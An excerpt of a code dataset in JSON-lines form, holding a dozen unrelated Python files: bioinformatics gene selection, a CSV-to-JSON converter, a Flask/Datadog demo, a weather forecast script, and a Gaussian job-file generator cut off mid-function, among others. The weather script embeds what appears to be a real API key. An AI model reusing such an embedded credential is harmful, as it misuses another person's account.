percentiles = [percentileofscore(mean, m) for m in mean]\n _, bins = np.histogram(percentiles, n_groups)\n bin_indices = np.digitize(percentiles, bins, True)\n # Right limit is treated differently in histogram and digitize\n # See https://github.com/numpy/numpy/issues/4217\n bin_indices[bin_indices == 0] = 1\n\n zscores = np.zeros_like(mean)\n for group in range(n_groups):\n group_indices, = np.where(bin_indices == group + 1)\n if self.method == SelectMostVariableGenes.Dispersion:\n group_mean = mean[group_indices]\n group_scores = np.divide(\n variance[group_indices], group_mean,\n out=np.zeros_like(group_mean), where=group_mean != 0\n )\n elif self.method == 
SelectMostVariableGenes.Variance:\n group_scores = variance[group_indices]\n elif self.method == SelectMostVariableGenes.Mean:\n group_scores = mean[group_indices]\n\n with np.errstate(invalid=\"ignore\"):\n zscores[group_indices] = zscore(group_scores)\n\n indices = np.argsort(np.nan_to_num(zscores))[-self.n_genes:]\n return self._filter_columns(data, indices)\n\n @staticmethod\n def _filter_columns(data, indices):\n indices = sorted(indices)\n domain = data.domain\n attrs, cls, metas = domain.attributes, domain.class_vars, domain.metas\n domain = Domain(tuple(np.array(attrs)[indices]), cls, metas)\n return data.transform(domain)\n\n\nclass DropoutWarning(Warning):\n pass\n\n\nclass DropoutGeneSelection(Preprocess):\n def __init__(self, n_genes=None, decay=1, x_offset=5, y_offset=0.02,\n threshold=0, at_least=0):\n self.n_genes = n_genes\n self.x_offset = x_offset\n self.y_offset = y_offset\n self.decay = decay\n self.threshold = threshold\n self.at_least = at_least\n\n def __call__(self, data: Table) -> Table:\n zero_rate, mean_expr = self.detection(data.X)\n selected = self.select_genes(zero_rate, mean_expr)\n if sum(selected) < self.n_genes:\n warnings.warn(f\"{sum(selected)} genes selected\", DropoutWarning)\n return self.filter_columns(data, selected)\n\n def detection(self, table: AnyArray) -> Tuple[np.ndarray, np.ndarray]:\n with np.errstate(invalid=\"ignore\"): # comparison can include nans\n mask = table > self.threshold\n\n if sp.issparse(table):\n A = table.copy()\n np.log2(A.data, out=A.data)\n else:\n A = np.ma.log2(table) # avoid log2(0)\n A.mask = False\n\n detection_rate = ut.nanmean(mask, axis=0)\n zero_rate = 1 - detection_rate\n detected = detection_rate > 0\n detected_mean = ut.nanmean(A[:, detected], axis=0)\n\n mean_expr = np.full_like(zero_rate, fill_value=np.nan)\n mean_expr[detected] = detected_mean / detection_rate[detected]\n\n low_detection = np.array(np.sum(mask, axis=0)).squeeze()\n zero_rate[low_detection < self.at_least] = np.nan\n mean_expr[low_detection < self.at_least] = np.nan\n return zero_rate, mean_expr\n\n def select_genes(self, zero_rate: np.ndarray,\n mean_expr: np.ndarray) -> np.ndarray:\n args = (mean_expr, zero_rate)\n return self.__get_selected(*args) if self.n_genes is None \\\n else self.__bisection(*args)\n\n def __bisection(self, mean_expr, zero_rate):\n low, up = 0, 10\n for t in range(100):\n selected = self.__get_selected(mean_expr, zero_rate)\n if np.sum(selected) == self.n_genes:\n break\n elif np.sum(selected) < self.n_genes:\n up = self.x_offset\n self.x_offset = (self.x_offset + low) / 2\n else:\n low = self.x_offset\n self.x_offset = (self.x_offset + up) / 2\n return selected\n\n def __get_selected(self, mean_expr, zero_rate):\n nonan = ~np.isnan(zero_rate)\n sel = np.zeros_like(zero_rate).astype(bool)\n x = mean_expr[nonan]\n y = self.y(x, self.decay, self.x_offset, self.y_offset)\n sel[nonan] = (zero_rate[nonan] > y)\n return sel\n\n @staticmethod\n def y(x, decay, x_offset, y_offset):\n return np.exp(-decay * (x - x_offset)) + y_offset\n\n @staticmethod\n def filter_columns(data: Table, mask: np.ndarray) -> Table:\n domain = data.domain\n return data.transform(Domain(tuple(np.array(domain.attributes)[mask]),\n domain.class_vars, domain.metas))\n","repo_name":"biolab/orange3-single-cell","sub_path":"orangecontrib/single_cell/preprocess/scpreprocess.py","file_name":"scpreprocess.py","file_ext":"py","file_size_in_byte":10477,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"99"} 
+{"seq_id":"23153483638","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set fileencodings=utf-8\n\nimport os\nimport re\nimport sys\nimport csv\nimport ast\nimport json\nimport argparse\nimport calendar\nfrom types import *\nfrom datetime import datetime\n\nclass NotSupportedError(NotImplementedError):\n pass\n\nclass InputConverter(object):\n\n def __init__(self):\n self.impl_map = {\n 'short' : int,\n 'int' : int,\n 'integer' : int,\n 'long' : long,\n 'float' : float,\n 'double' : float,\n 'string' : self.convert_string,\n 'timestamp' : long,\n 'array' : self.convert_array,\n 'boolean' : bool\n }\n\n def get_impl(self, name):\n impl = self.impl_map.get(name)\n if not impl:\n raise NotSupportedError('\"{}\" is not a supported type'.format(name))\n return impl\n\n def convert_string(self, value):\n return value.decode('utf-8')\n\n def convert_array(self, value):\n return self.convert_string(value).split(u',')\n\n\ndef convert(infile, outfile, columns, delimiter='|', quotechar='\"'):\n \"\"\"\n Convert infile (stdin) formatted as csv (with column headers)\n to outfile (stdout) formatted as json\n \"\"\"\n\n converter = InputConverter()\n cols = [col.split(':') for col in columns]\n function_seq = [(c[0], converter.get_impl(c[1])) for c in cols]\n\n reader = csv.DictReader(infile, [c[0] for c in cols],\n delimiter=delimiter, quotechar=quotechar)\n for row in reader:\n for k, impl in function_seq:\n if row[k] == '\\\\N':\n row[k] = None # NULL -> None\n else:\n row[k] = impl(row[k])\n outfile.write(json.dumps(row))\n outfile.write('\\n')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Convert MySQL csv to Crate JSON')\n parser.add_argument('infile', nargs='?',\n type=argparse.FileType('r'),\n help='path to csv file',\n default=sys.stdin)\n parser.add_argument('outfile', nargs='?',\n type=argparse.FileType('w'),\n help='path to json file',\n default=sys.stdout)\n parser.add_argument('--columns', nargs='*',\n help=\"\"\"column definition formatted as col_name:col_type [...]\n column types are: short, int, integer, long, float, double, string, timestamp, array\"\"\")\n args = parser.parse_args()\n convert(args.infile, args.outfile, args.columns)\n","repo_name":"realxujiang/labs","sub_path":"common/code/csv2json.py","file_name":"csv2json.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"99"} +{"seq_id":"7005265690","text":"#-*- coding: UTF-8 -*-\r\nimport apiutil\r\nimport json\r\n\r\napp_key = 'xxx'\r\napp_id = 'xxx'\r\n\r\nif __name__ == '__main__':\r\n str_question = '你好吗?'\r\n ai_obj = apiutil.AiPlat(app_id, app_key)\r\n\r\n print('----------------------SEND REQ----------------------')\r\n rsp = ai_obj.getNlpTextchat(str_question)\r\n if rsp['ret'] == 0:\r\n print(rsp['data']['answer'])\r\n print('----------------------API SUCC----------------------')\r\n else:\r\n print(json.dumps(rsp, ensure_ascii=False, sort_keys=False, indent=4))\r\n print('----------------------API FAIL----------------------')\r\n\r\n","repo_name":"PengJenas/tx-ai","sub_path":"demo/test_nlp_textchat.py","file_name":"test_nlp_textchat.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"17347831513","text":"from flask import Flask\nfrom datadog import statsd\nimport logging\n\nimport os\n\n# This is a small example application\n# It uses tracing and dogstatsd on a sample flask 
application\n\nlog = logging.getLogger(\"app\")\n\napp = Flask(__name__)\n\n# The app has two routes, a basic endpoint and an exception endpoint\n@app.route(\"/\")\ndef hello():\n statsd.increment('request.number', 1, tags=[\"test\", \"foo:bar\", \"my:app\"])\n log.info(\"Got a request at hello\")\n return \"Hello World!\"\n\n@app.route(\"/error\")\ndef error():\n statsd.increment('request.error.number', 1, tags=[\"test\", \"foo:bar\", \"my:app\"])\n log.info(\"Got a request at error\")\n raise Exception()\n\n# This is meant to be run directly, instead of executed through flask run\nif __name__ == '__main__':\n # It grabs the host and port from the environment\n port = 5001\n host = '0.0.0.0'\n if os.environ.get('HOST'):\n host = os.environ.get('HOST')\n if os.environ.get('PORT'):\n port = os.environ.get('PORT')\n app.run(debug=True, host=host, port=port)\n","repo_name":"DataDog/datadog-cloudfoundry-buildpack","sub_path":"docker/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"99"} +{"seq_id":"8463283349","text":"# https://www.acmicpc.net/problem/11650\n# 좌표 정렬하기.py\n\ncoordinate = []\nn = int(input())\nfor i in range(n):\n coordinate.append(list(map(int,input().split())))\ncoordinate.sort(key=lambda x : (x[0], x[1]))\nfor x in coordinate:\n print(x[0],x[1]) ","repo_name":"cokemania2/workspace","sub_path":"codingTest/백준/좌표 정렬하기.py","file_name":"좌표 정렬하기.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32170336764","text":"import requests\n# s_city = \"Petersburg,RU\"\nappid = \"ee5d55c03e00461d6c01b4e1b991bc40\"\n# city_id for SPb\ncity_id = 498817\n\n\n# Прогноз\ndef request_forecast(city_id):\n try:\n res = requests.get(\"http://api.openweathermap.org/data/2.5/forecast\",\n params={'id': city_id, 'units': 'metric', 'lang': 'ru', 'APPID': appid})\n data = res.json()\n print('city:', data['city']['name'], data['city']['country'])\n sum = 0\n count = 0\n a = []\n morns_six = []\n morns_nine = []\n for i in data['list']:\n if i['dt_txt'].find('06:00:00') != -1:\n morns_six.append(i['main']['temp'])\n if i['dt_txt'].find('09:00:00') != -1:\n morns_nine.append(i['main']['temp'])\n sum += i['main']['temp']\n count += 1\n except Exception as e:\n print(\"Exception (forecast):\", e)\n pass\n\n print(\"Средняя температура = \", format(round(sum/count, 2)))\n print('Максимальная прогнозная утренняя (6-и утра) температура = ', max(morns_six))\n print('Максимальная прогнозная утренняя (9-и утра) температура = ', max(morns_nine))\n\n\nrequest_forecast(city_id)\n","repo_name":"Tcheburatz0/Weather_forecast","sub_path":"AVAR_testing.py","file_name":"AVAR_testing.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"42582011284","text":"#!/usr/bin/python3\n\"\"\"\nThis is the \"Square\" module.\n\nThis module provides a simple Square class with initialize size.\n\"\"\"\n\n\nclass Square:\n \"\"\"A class that defines a square by size, which defaults 0.\n Also defines position using a tuple, which defaults (0, 0).\n Square can also get area, and print square using '#'.\n When printing, using position, offset on top and left.\n \"\"\"\n def __init__(self, size=0, position=(0, 0)):\n \"\"\"This is the __init__ method\"\"\"\n self.position = position\n self.size = size\n\n @property\n def 
size(self):\n \"\"\"This is a public instance method\"\"\"\n return self.__size\n\n @size.setter\n def size(self, value):\n self.value = value\n if type(value) is not int:\n raise TypeError(\"size must be an integer\")\n elif value < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = value\n\n @property\n def position(self):\n \"\"\"This is a public instance method\"\"\"\n return self.__position\n\n @position.setter\n def position(self, value):\n \"\"\"This is a public instance method\"\"\"\n if \\\n type(value) is not tuple or \\\n len(value) != 2 or type(value[0]) is not int or \\\n type(value[1]) is not int or value[0] < 0 or value[1] < 0:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n else:\n self.__position = value\n\n def area(self):\n \"\"\"This is a public instance method\"\"\"\n return self.__size * self.__size\n\n def my_print(self):\n \"\"\"Print a square method\"\"\"\n if self.__size is 0:\n print(\"\")\n else:\n if self.__position[1] is not 0:\n print(\"\\n\" * self.__position[1], end='')\n for i in range(self.__size):\n print(\" \" * self.__position[0], end='')\n print(\"#\" * self.__size)\n","repo_name":"hug0-cstrs/holbertonschool-higher_level_programming","sub_path":"python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27746386979","text":"import csv\n\n# open the two CSV files to be merged\nwith open('Employee_Clean_ScannedData.csv', 'r') as file1, open('Tool_Clean_ScannedData.csv', 'r') as file2:\n\n # create a reader object for each file\n reader1 = csv.reader(file1)\n reader2 = csv.reader(file2)\n\n # create a new CSV file for the merged data\n with open('merged_file.csv', 'w', newline='') as merged_file:\n\n # create a writer object for the new file with 9 columns\n writer = csv.writer(merged_file, delimiter=',')\n\n # loop through the rows of both files simultaneously and write them to the new file with 9 columns\n for row1, row2 in zip(reader1, reader2):\n writer.writerow(row1 + row2)\n","repo_name":"HamniZeen/Digitizing-Equipment-Management-System-for-Aviation-Industry-in-Sri-Lanka","sub_path":"combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"23044024875","text":"# -*- coding: utf-8 -*-\n\"\"\"Asynchronous request parser. Compatible with Python>=3.4.\"\"\"\nimport asyncio\nimport collections\nimport inspect\nimport functools\n\nimport marshmallow as ma\nfrom marshmallow.compat import iteritems\nfrom marshmallow.utils import missing\n\nfrom webargs import core\n\nclass AsyncParser(core.Parser):\n \"\"\"Asynchronous variant of `webargs.core.Parser`, where parsing methods may be\n either coroutines or regular methods.\n \"\"\"\n\n @asyncio.coroutine\n def _parse_request(self, schema, req, locations):\n if schema.many:\n assert 'json' in locations, 'schema.many=True is only supported for JSON location'\n # The ad hoc Nested field is more like a workaround or a helper, and it servers its\n # purpose fine. 
However, if somebody has a desire to re-design the support of\n # bulk-type arguments, go ahead.\n parsed = yield from self.parse_arg(\n name='json',\n field=ma.fields.Nested(schema, many=True),\n req=req,\n locations=locations\n )\n if parsed is missing:\n parsed = []\n else:\n argdict = schema.fields\n parsed = {}\n for argname, field_obj in iteritems(argdict):\n parsed_value = yield from self.parse_arg(argname, field_obj, req, locations)\n # If load_from is specified on the field, try to parse from that key\n if parsed_value is missing and field_obj.load_from:\n parsed_value = yield from self.parse_arg(field_obj.load_from,\n field_obj, req, locations)\n argname = field_obj.load_from\n if parsed_value is not missing:\n parsed[argname] = parsed_value\n return parsed\n\n # TODO: Lots of duplication from core.Parser here. Rethink.\n @asyncio.coroutine\n def parse(self, argmap, req=None, locations=None, validate=None, force_all=False):\n \"\"\"Coroutine variant of `webargs.core.Parser`.\n\n Receives the same arguments as `webargs.core.Parser.parse`.\n \"\"\"\n req = req if req is not None else self.get_default_request()\n assert req is not None, 'Must pass req object'\n ret = None\n validators = core._ensure_list_of_callables(validate)\n schema = self._get_schema(argmap, req)\n try:\n parsed = yield from self._parse_request(schema=schema, req=req, locations=locations)\n result = self.load(parsed, schema)\n self._validate_arguments(result.data, validators)\n except ma.exceptions.ValidationError as error:\n self._on_validation_error(error)\n else:\n ret = result.data\n finally:\n self.clear_cache()\n if force_all:\n core.fill_in_missing_args(ret, argmap)\n return ret\n\n def use_args(self, argmap, req=None, locations=None, as_kwargs=False, validate=None):\n \"\"\"Decorator that injects parsed arguments into a view function or method.\n\n .. warning::\n This will not work with `async def` coroutines. Either use a generator-based\n coroutine decorated with `asyncio.coroutine` or use the\n `parse ` method.\n\n Receives the same arguments as `webargs.core.Parser.use_args`.\n \"\"\"\n locations = locations or self.locations\n request_obj = req\n # Optimization: If argmap is passed as a dictionary, we only need\n # to generate a Schema once\n if isinstance(argmap, collections.Mapping):\n argmap = core.argmap2schema(argmap)()\n\n def decorator(func):\n req_ = request_obj\n\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n req_obj = req_\n\n # if as_kwargs is passed, must include all args\n force_all = as_kwargs\n\n if not req_obj:\n req_obj = self.get_request_from_view_args(func, args, kwargs)\n # NOTE: At this point, argmap may be a Schema, callable, or dict\n parsed_args = yield from self.parse(argmap,\n req=req_obj, locations=locations,\n validate=validate, force_all=force_all)\n if as_kwargs:\n kwargs.update(parsed_args)\n return func(*args, **kwargs)\n else:\n # Add parsed_args after other positional arguments\n new_args = args + (parsed_args, )\n return func(*new_args, **kwargs)\n wrapper.__wrapped__ = func\n return wrapper\n return decorator\n\n def use_kwargs(self, *args, **kwargs):\n \"\"\"Decorator that injects parsed arguments into a view function or method.\n\n .. warning::\n This will not work with `async def` coroutines. 
Either use a generator-based\n coroutine decorated with `asyncio.coroutine` or use the\n `parse ` method.\n\n Receives the same arguments as `webargs.core.Parser.use_kwargs`.\n\n \"\"\"\n return super().use_kwargs(*args, **kwargs)\n\n @asyncio.coroutine\n def parse_arg(self, name, field, req, locations=None):\n location = field.metadata.get('location')\n if location:\n locations_to_check = self._validated_locations([location])\n else:\n locations_to_check = self._validated_locations(locations or self.locations)\n\n for location in locations_to_check:\n value = yield from self._get_value(name, field, req=req, location=location)\n # Found the value; validate and return it\n if value is not core.missing:\n return value\n return core.missing\n\n @asyncio.coroutine\n def _get_value(self, name, argobj, req, location):\n # Parsing function to call\n # May be a method name (str) or a function\n func = self.__location_map__.get(location)\n if func:\n if inspect.isfunction(func):\n function = func\n else:\n function = getattr(self, func)\n if asyncio.iscoroutinefunction(function):\n value = yield from function(req, name, argobj)\n else:\n value = function(req, name, argobj)\n else:\n raise ValueError('Invalid location: \"{0}\"'.format(location))\n return value\n","repo_name":"r0b1n1sl4m/Peasy-Note","sub_path":"env/lib/python3.6/site-packages/webargs/async.py","file_name":"async.py","file_ext":"py","file_size_in_byte":6631,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"1546136676","text":"class Solution:\n def findSubsequences(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n Purpose: Returns all different possible increasing subsequences of \n a given array with at least two elements. \n\n Note: Answer can be returned in any order.\n \"\"\"\n def traverse(arr, start, path, seen):\n if len(path) >=2 and path not in self.res and path == sorted(path):\n self.res.append(path[:])\n for i in range(start, len(arr)):\n if i not in seen:\n path.append(arr[i])\n seen.add(i)\n traverse(arr, i+1, path, seen)\n \n path.pop()\n seen.remove(i)\n\n self.res = []\n traverse(nums, 0, [], set())\n return self.res\n\n\n def findSubsequences1(self, nums):\n \"\"\"\n Improved solution.\n \"\"\"\n def traverse(arr, start, path):\n if len(path) >= 2 and path not in self.res and path == sorted(path):\n self.res.append(path[:])\n\n for i in range(start, len(arr)):\n path.append(arr[i])\n traverse(arr, i+1, path)\n path.pop()\n\n self.res = []\n traverse(nums, 0, [])\n return self.res\n\n def addToTarget(self, nums, target):\n \"\"\"\n Purpose: Finds all subsequences whose elements add up to target.\n \"\"\"\n def backtrack(arr, start, path):\n # stop condition\n if sum(path) == target:\n self.res.append(path[:])\n\n for i in range(start, len(arr)):\n path.append(arr[i])\n backtrack(arr, start+1, path)\n path.pop()\n\n return\n \n self.res = []\n backtrack(nums, 0, [])\n return self.res","repo_name":"tashakim/puzzles_python","sub_path":"backtrackIncSubseq.py","file_name":"backtrackIncSubseq.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"14448097522","text":"#Задание 3.\n# Создать классы Cat, Dog которые будут наследоватся от класса Animal.\n\nclass Animal:\n def can_eat(self):\n print('i can Eat')\n\n def can_move(self):\n print('i can Move')\n\nclass Dog(Animal):\n def make_noize(self):\n print('Bark!, Bark!')\n\nclass Cat(Animal):\n def 
make_noize(self):\n print('Meowww...')\n\nNemo = Animal()\nNemo.can_eat()\nNemo.can_move()\n\nRex = Dog()\nRex.can_move()\nRex.make_noize()\n\nTom = Cat()\nTom.can_eat()\nTom.make_noize()\n","repo_name":"nurlan5t/python-homeworks","sub_path":"OOP | encapsulation, polymorphism, inheritance'/homework11_inheritance.py","file_name":"homework11_inheritance.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"72020305925","text":"import numpy as np\nimport os\nimport math\nimport random\nfrom numpy import genfromtxt\nimport numpy as npimport\nfrom numpy import genfromtxt\nimport pandas as pd\n# import re\nimport glob\nimport subprocess\nfrom .molecule_json import Molecule\nfrom .molecule_json import MoleculeList\n\n\ndef CFOUR_input_files(\n method,\n basis_set,\n mem_ZMAT,\n mem_pbs,\n data,\n dir_name,\n cluster='map',\n baseName='mexc',\n):\n if cluster == 'map':\n with open('%s/ZMAT' % (dir_name), 'w') as fp:\n fp.write(\"%s\\n\" % (dir_name))\n fp.write(data)\n fp.write('\\n\\n')\n fp.write(\"*CFOUR(CHARGE=0,REFERENCE=RHF,SPHERICAL=ON,BASIS=%s\\n\" %\n basis_set)\n fp.write(\"LINDEP_TOL=7,LINEQ_CONV=7,SCF_CONV=6,SCF_MAXCYC=250\\n\")\n fp.write(\n \"CALC=%s,EXCITE=EOMEE,ESTATE_SYM=5\\nESTATE_PROP=EXPECTATION\\nCOORDS=CARTESIAN\\n\"\n % method)\n fp.write(\n \"FROZEN_CORE=ON,ABCDTYPE=AOBASIS\\nCONVERGENCE=7,MEMORY_SIZE=%s,MEM_UNIT=GB)\\n\"\n % mem_ZMAT)\n with open('%s/%s.pbs' % (dir_name, baseName), 'w') as fp:\n fp.write(\"#!/bin/csh\\n#\\n#PBS -N %s\\n\" % baseName)\n fp.write(\n \"#PBS -S /bin/csh\\n#PBS -j oe\\n#PBS -W umask=022\\n#PBS -l cput=2400:00:00\\n#PBS -l mem=%sgb\\n#PBS -l nodes=1:ppn=2\\n#PBS -q gpu\"\n % mem_pbs)\n fp.write(\n '\\n\\ncd $PBS_O_WORKDIR\\nsetenv NUM $NCPUS\\necho \"$NUM cores requested in PBS file\"\\necho \" \"\\nsource /ddn/home1/r1621/.tschrc\\n/ddn/home1/r1621/maple/bin/tempQC/bin/c4ext_old.sh 20\\n'\n )\n return\n\n\ndef gaussianInputFiles(output_num,\n method_opt,\n basis_set_opt,\n mem_com_opt,\n mem_pbs_opt,\n cluster,\n baseName='mexc',\n procedure='OPT',\n data='',\n dir_name='',\n solvent='',\n outName='mexc_o'):\n # baseName = baseName.com / baseName.pbs / baseName.out\n # dir_name = directory name\n output_num = str(output_num)\n if output_num == '0':\n output_num = ''\n\n if dir_name == '':\n dir_name = baseName\n\n if data == '':\n with open('tmp.txt') as fp:\n data = fp.read()\n\n # Reading data from file2\n charges = \"0 1\"\n\n if cluster == \"map\":\n with open('%s/%s.com' % (dir_name, baseName), 'w') as fp:\n fp.write(\"%mem={0}mb\\n\".format(mem_com_opt))\n fp.write(\"%nprocs=4\\n\")\n if solvent == '':\n fp.write(\"#N %s/%s %s\" %\n (method_opt, basis_set_opt, procedure))\n else:\n fp.write(\"#N %s/%s %s %s\" %\n (method_opt, basis_set_opt, procedure, solvent))\n\n fp.write(\"\\n\\n\")\n fp.write(\n \"Name ModRedundant - Minimalist working constrained optimisation\\n\"\n )\n fp.write(\"\\n\")\n fp.write(charges + \"\\n\")\n fp.write(data)\n fp.write(\"\\n\")\n\n with open('%s/%s.pbs' % (dir_name, baseName), 'w') as fp:\n fp.write(\"#!/bin/sh\\n\")\n fp.write(\n \"#PBS -N %s_o\\n#PBS -S /bin/bash\\n#PBS -j oe\\n#PBS -m abe\\n#PBS -l \"\n % outName)\n fp.write(\"mem={0}gb\\n\".format(mem_pbs_opt))\n # r410 node\n fp.write(\"#PBS -q r410\\n\")\n fp.write(\"#PBS -W umask=022\\n\")\n fp.write(\n \"#PBS -l nodes=1:ppn=1\\n#PBS -q gpu\\n\\nscrdir=/tmp/$USER.$PBS_JOBID\\n\\n\"\n )\n fp.write(\n \"mkdir -p $scrdir\\nexport 
GAUSS_SCRDIR=$scrdir\\nexport OMP_NUM_THREADS=1\\n\\n\"\n )\n fp.write(\n \"\"\"echo \"exec_host = $HOSTNAME\"\\n\\nif [[ $HOSTNAME =~ cn([0-9]{3}) ]];\\n\"\"\"\n )\n fp.write(\"then\\n\")\n fp.write(\n \" nodenum=${BASH_REMATCH[1]};\\n nodenum=$((10#$nodenum));\\n echo $nodenum\\n\\n\"\n )\n fp.write(\n \"\"\" if (( $nodenum <= 29 ))\\n then\\n echo \"Using AVX version\";\\n\"\"\"\n )\n fp.write(\n \" export g16root=/usr/local/apps/gaussian/g16-b01-avx/\\n elif (( $nodenum > 29 ))\\n\"\n )\n fp.write(\n \"\"\" then\\n echo \"Using AVX2 version\";\\n export g16root=/usr/local/apps/gaussian/g16-b01-avx2/\\n else\\n\"\"\"\n )\n fp.write(\n \"\"\" echo \"Unexpected condition!\"\\n exit 1;\\n fi\\nelse\\n\"\"\"\n )\n fp.write(\"\"\" echo \"Not on a compute node!\"\\n exit 1;\\nfi\\n\\n\"\"\")\n fp.write(\n \"cd $PBS_O_WORKDIR\\n. $g16root/g16/bsd/g16.profile\\ng16 {0}.com {0}.out\"\n .format(baseName, baseName) + str(output_num) +\n \"\\n\\nrm -r $scrdir\\n\")\n elif cluster == 'seq':\n with open('%s/%s.com' % (dir_name, baseName), 'w') as fp:\n fp.write('%mem=8gb\\n')\n if solvent == '':\n fp.write(\"#N %s/%s %s\" %\n (method_opt, basis_set_opt, procedure))\n else:\n fp.write(\"#N %s/%s %s %s\" %\n (method_opt, basis_set_opt, procedure, solvent))\n\n fp.write(\"\\n\\n\")\n fp.write(\"Name \\n\")\n fp.write(\"\\n\")\n fp.write(charges + \"\\n\")\n fp.write(data)\n fp.write(\"\\n\")\n\n with open('%s/%s.pbs' % (dir_name, baseName), 'w') as fp:\n fp.write(\"#!/bin/sh\\n\")\n fp.write(\n \"#PBS -N %s_o\\n#PBS -S /bin/bash\\n#PBS -W umask=022\\n#PBS -j oe\\n#PBS -m abe\\n#PBS -l cput=1000:00:00\\n#PBS -l \"\n % outName)\n fp.write(\"mem={0}gb\\n\".format(mem_pbs_opt))\n fp.write(\"#PBS -l nodes=1:ppn=2\\n#PBS -l file=100gb\\n\\n\")\n fp.write(\n \"export g09root=/usr/local/apps/\\n. 
$g09root/g09/bsd/g09.profile\\n\\n\"\n )\n fp.write(\n \"scrdir=/tmp/bnp.$PBS_JOBID\\n\\nmkdir -p $scrdir\\nexport GAUSS_SCRDIR=$scrdir\\nexport OMP_NUM_THREADS=1\\n\\n\"\n )\n fp.write(\n \"printf 'exec_host = '\\nhead -n 1 $PBS_NODEFILE\\n\\ncd $PBS_O_WORKDIR\\n\\n\"\n )\n fp.write(\"/usr/local/apps/bin/g09setup %s.com %s.out%s\" %\n (baseName, baseName, output_num))\n\n\n# from ice_analogs, but modified input files\ndef Convert(string):\n li = list(string.split(\" \"))\n return li\n\n\ndef cleanLine(line):\n aList = []\n cropped_line = line.rstrip()\n for i in range(2, 10):\n k = ' ' * i\n cropped_line = cropped_line.replace(k, \" \")\n cropped_line = cropped_line.split(\" \")\n for i in cropped_line:\n if i == '':\n continue\n else:\n aList.append(float(i))\n return aList\n\n\ndef conv_num(string):\n li = list(string.split(\" \"))\n return li\n\n\ndef clean_many_txt(geomDirName, xyzSmiles=True, numbered=True):\n \"\"\" This will replace the numerical forms of the elements as their letters numbered in order \"\"\"\n\n f = open('tmp.txt', 'r')\n \"\"\"\n a = ['14.0 ','30.0 ' ,\n '16.0 ', '6.0 ',\n '8.0 ', '1.0 ',\n '7.0 '\n ]\n table = {\n '6.0 ': 'C', '8.0 ': 'O',\n '1.0 ': 'H', '7.0 ': 'N',\n '16.0 ': 'S', '30.0 ': 'Zn',\n '14.0 ': 'Si'\n }\n \"\"\"\n a = [\n '14.000000 ', '30.000000 ', '16.000000 ', '6.000000 ', '8.000000 ',\n '1.000000 ', '7.000000 '\n ]\n table = {\n '6.000000 ': 'C',\n '8.000000 ': 'O',\n '1.000000 ': 'H',\n '7.000000 ': 'N',\n '16.000000 ': 'S',\n '30.000000 ': 'Zn',\n '14.000000 ': 'Si'\n }\n\n xyzToMolLst = []\n lst = []\n cnt2 = 0\n for line in f:\n cnt2 += 1\n for word in a:\n if word in line:\n convert_wrd = table[word]\n line2 = line.replace(word, convert_wrd + \" \")\n if numbered:\n line = line.replace(word, convert_wrd + str(cnt2) + \" \")\n else:\n line = line.replace(word, convert_wrd + \" \")\n\n lst.append(line)\n xyzToMolLst.append(line2)\n f.close()\n f = open('tmp.txt', 'w')\n length = 0\n for line in lst:\n f.write(line)\n length += 1\n f.close()\n if xyzSmiles:\n xyzToSmiles(length, xyzToMolLst, geomDirName)\n\n\ndef i_freq_check(filename):\n imaginary = False\n frequency = \"Frequencies --\"\n dif = 0\n freq_lst_len = []\n with open(filename) as search:\n\n freq_clean = []\n for num, line in enumerate(search):\n if frequency in line:\n freq_lst_len.append(num)\n freq_line = line[16:].split(\" \")\n for k in freq_line:\n k = k.rstrip()\n try:\n k = float(k)\n if k < 0:\n imaginary = True\n freq_clean.append(k)\n except:\n pass\n if len(freq_lst_len) > 1:\n break\n try:\n freq_lst_len = [freq_lst_len[0] + 5, freq_lst_len[1] - 2]\n except:\n pass\n\n return imaginary, freq_clean, freq_lst_len\n\n\ndef add_imaginary(freq_clean, freq_lst_len, filename, geomDirName):\n cnt = 0\n for k in freq_clean:\n if k < 0:\n cnt += 1\n if cnt > 2:\n break\n\n f = open(filename)\n lines = f.readlines()\n f.close()\n imag_values = lines[freq_lst_len[0]:freq_lst_len[1]]\n for num, i in enumerate(imag_values):\n i = i.replace(\" \", \" \")\n i = i.replace(\" \", \" \")\n i = i.replace(\" \", \" \")\n i = i.replace(\"\\n\", \"\")\n i = (i.split(\" \"))[3:3 + cnt * 3]\n for k in range(len(i)):\n i[k] = float(i[k])\n imag_values[num] = i\n carts = genfromtxt('tmp.txt')\n carts_no_atom = carts[:, 1:4]\n imag_values = np.array(imag_values)\n\n for i in range(len(imag_values[0, :]) // 3):\n carts_no_atom = np.add(carts_no_atom, imag_values[:, i:i + 4])\n carts[:, 1:4] = carts_no_atom\n\n carts = np.around(carts, 6)\n \"\"\" carts = carts.astype(str)\n carts = 
